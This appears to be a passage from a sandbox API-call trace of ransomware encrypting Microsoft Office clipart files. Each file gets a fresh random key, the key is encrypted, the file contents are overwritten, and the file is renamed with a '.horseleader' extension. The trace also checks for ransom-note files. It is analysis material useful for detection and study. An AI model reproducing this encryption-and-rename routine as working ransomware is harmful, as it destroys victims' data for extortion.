[0254.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.horseleader")) returned 1 [0254.412] GetProcessHeap () returned 0x780000 [0254.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.413] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x964, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01170_.WMF", cAlternateFileName="")) returned 1 [0254.413] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="Windows") returned -1 [0254.413] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 67 [0254.413] StrStrIW (lpFirst="DD01170_.WMF", lpSrch=".horseleader") returned 0x0 [0254.413] lstrcmpW (lpString1="DD01170_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.413] lstrcmpW (lpString1="DD01170_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.413] lstrlenW (lpString=".testttjffg") returned 11 [0254.413] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.414] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 67 [0254.414] StrStrW (lpFirst="DD01170_.WMF", lpSrch=".txt") returned 0x0 [0254.414] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2404) returned 1 [0254.414] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x964, lpOverlapped=0x0) returned 1 [0254.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff69c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.417] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x964, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x964, lpOverlapped=0x0) returned 1 [0254.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.417] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.418] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.418] CloseHandle (hObject=0x158) returned 1 [0254.418] GetProcessHeap () returned 0x780000 [0254.418] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.418] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.horseleader") returned 79 [0254.418] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.horseleader")) returned 1 [0254.419] GetProcessHeap () returned 0x780000 [0254.419] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.419] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01171_.WMF", cAlternateFileName="")) returned 1 [0254.420] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="Windows") returned -1 [0254.420] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 67 [0254.420] StrStrIW (lpFirst="DD01171_.WMF", lpSrch=".horseleader") returned 0x0 [0254.420] lstrcmpW (lpString1="DD01171_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.420] lstrcmpW 
(lpString1="DD01171_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.420] lstrlenW (lpString=".testttjffg") returned 11 [0254.420] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.420] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.420] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.421] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.421] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 67 [0254.422] StrStrW (lpFirst="DD01171_.WMF", lpSrch=".txt") returned 0x0 [0254.422] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2052) returned 1 [0254.422] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0254.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.424] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x804, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0254.424] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0x0) returned 1 [0254.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.424] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.425] CloseHandle (hObject=0x158) returned 1 [0254.425] GetProcessHeap () returned 0x780000 [0254.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.425] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.horseleader") returned 79 [0254.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.horseleader")) returned 1 [0254.427] GetProcessHeap () returned 0x780000 [0254.427] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.427] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01172_.WMF", cAlternateFileName="")) returned 1 [0254.427] lstrcmpiW 
(lpString1="DD01172_.WMF", lpString2="Windows") returned -1 [0254.427] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 67 [0254.427] StrStrIW (lpFirst="DD01172_.WMF", lpSrch=".horseleader") returned 0x0 [0254.427] lstrcmpW (lpString1="DD01172_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.427] lstrcmpW (lpString1="DD01172_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.427] lstrlenW (lpString=".testttjffg") returned 11 [0254.427] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.428] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.428] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 67 [0254.429] StrStrW (lpFirst="DD01172_.WMF", lpSrch=".txt") returned 0x0 [0254.429] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2232) returned 1 [0254.429] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x8b8, lpOverlapped=0x0) returned 1 [0254.434] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff748, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.435] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x8b8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x8b8, lpOverlapped=0x0) returned 1 [0254.435] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.435] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.435] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.435] CloseHandle (hObject=0x158) returned 1 [0254.436] GetProcessHeap () returned 0x780000 [0254.436] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.436] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.horseleader") returned 79 [0254.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.horseleader")) returned 1 [0254.437] GetProcessHeap () returned 0x780000 [0254.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.437] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x70c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01173_.WMF", cAlternateFileName="")) returned 1 [0254.437] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="Windows") returned -1 [0254.437] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 67 [0254.437] StrStrIW (lpFirst="DD01173_.WMF", lpSrch=".horseleader") returned 0x0 [0254.437] lstrcmpW (lpString1="DD01173_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.437] lstrcmpW (lpString1="DD01173_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.437] lstrlenW (lpString=".testttjffg") returned 11 [0254.438] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF") returned 67 [0254.445] StrStrW 
(lpFirst="DD01173_.WMF", lpSrch=".txt") returned 0x0 [0254.445] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1804) returned 1 [0254.445] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x70c, lpOverlapped=0x0) returned 1 [0254.493] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.493] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x70c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x70c, lpOverlapped=0x0) returned 1 [0254.494] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.494] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.495] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.495] CloseHandle (hObject=0x158) returned 1 [0254.495] GetProcessHeap () returned 0x780000 [0254.495] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.495] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.horseleader") returned 79 [0254.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.horseleader")) returned 1 [0254.496] GetProcessHeap () returned 0x780000 [0254.496] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.496] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x760, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01176_.WMF", cAlternateFileName="")) returned 1 [0254.496] lstrcmpiW (lpString1="DD01176_.WMF", lpString2="Windows") returned -1 [0254.496] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 67 [0254.496] StrStrIW (lpFirst="DD01176_.WMF", lpSrch=".horseleader") returned 0x0 [0254.496] lstrcmpW (lpString1="DD01176_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.496] lstrcmpW (lpString1="DD01176_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.496] lstrlenW (lpString=".testttjffg") returned 11 [0254.497] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.497] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.497] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.497] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.497] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 67 [0254.497] StrStrW (lpFirst="DD01176_.WMF", lpSrch=".txt") returned 0x0 [0254.497] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1888) returned 1 [0254.498] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x760, lpOverlapped=0x0) returned 1 [0254.500] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff8a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.500] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x760, lpOverlapped=0x0) returned 1 [0254.501] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.501] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.501] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.501] CloseHandle (hObject=0x158) returned 1 [0254.501] GetProcessHeap () returned 0x780000 [0254.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0254.501] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.horseleader") returned 79 [0254.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.horseleader")) returned 1 [0254.502] GetProcessHeap () returned 0x780000 [0254.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.502] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xed4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01178_.WMF", cAlternateFileName="")) returned 1 [0254.503] lstrcmpiW (lpString1="DD01178_.WMF", lpString2="Windows") returned -1 [0254.503] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0254.503] StrStrIW (lpFirst="DD01178_.WMF", lpSrch=".horseleader") returned 0x0 [0254.503] lstrcmpW (lpString1="DD01178_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.503] lstrcmpW (lpString1="DD01178_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.503] lstrlenW (lpString=".testttjffg") returned 11 [0254.503] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF", 
lpSrch=".testttjffg") returned 0x0 [0254.503] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.503] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.503] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 67 [0254.504] 